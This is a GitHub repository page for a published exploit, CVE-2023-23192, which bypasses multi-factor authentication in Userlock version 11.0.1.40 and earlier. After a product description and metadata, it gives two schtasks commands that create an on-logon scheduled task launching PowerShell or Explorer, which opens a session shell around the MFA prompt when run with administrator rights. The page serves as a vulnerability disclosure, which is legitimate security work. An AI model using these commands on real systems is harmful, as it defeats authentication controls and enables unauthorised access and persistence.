Skip to content

pinarsadioglu/CVE-2023-23192

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-2023-23192

CVE-2023-23192- Userlock - Multi-Factor Authentication (MFA) Bypass

Exploit Title: Userlock - Multi-Factor Authentication (MFA) Bypass

Date: 01/11/2023

Exploit Author: Pinar Sadioglu

Vendor Homepage: https://www.isdecisions.com/products/userlock/help/#

Version: < = 11.0.1.40

Tested on: Windows 10

Software : Tested with the Userlock 'Desktop agent' to protect interactive sessions on workstations or on terminal servers.

CVE : CVE-2023-23192

MITRE ATT&CK: T1053.005 - Scheduled Task/Job: Scheduled Task

Permissions Required: Administrator, Root

https://nvd.nist.gov/vuln/detail/CVE-2023-23192

Description: Userlock is a Multi-Factor Authentication solution for Windows Active Directory & Cloud Environments to stop unauthorized and unwanted access. It enables customized, two-factor authentication (2FA) on Windows logon, Remote Desktop (RDP & RD Gateway), IIS, VPN and Cloud Applications.Userlock allows you to implement MFA to your Active Directory logons domain joined workstations and servers. A dialog box is prompted where you can enter the OTP code, from the Authenticatior App at first logon of the day to their workstation. Userlock integrates with the logon process to deliver two-factor authentication.

One of the most commonly exploited strategies employed by threat actors to build persistence on a victim's computer is task scheduling. The adversary frequently use this strategy to evade automated detection, maintain persistence, and carry out surprise attacks after long periods of lying low.

Vulnerability:

Create a scheduled task that executed after at log on of any user.

> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c powershell.exe"

mfa

After successfully logging on with the domain credentials, scheduled cmd.exe is prompted with the Userlock MFA dialog box.

> schtasks /create /tn "MFA_Bypass_OnLogon" /sc onlogon /tr "cmd.exe /c explorer.exe"

About

CVE-2023-23192

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published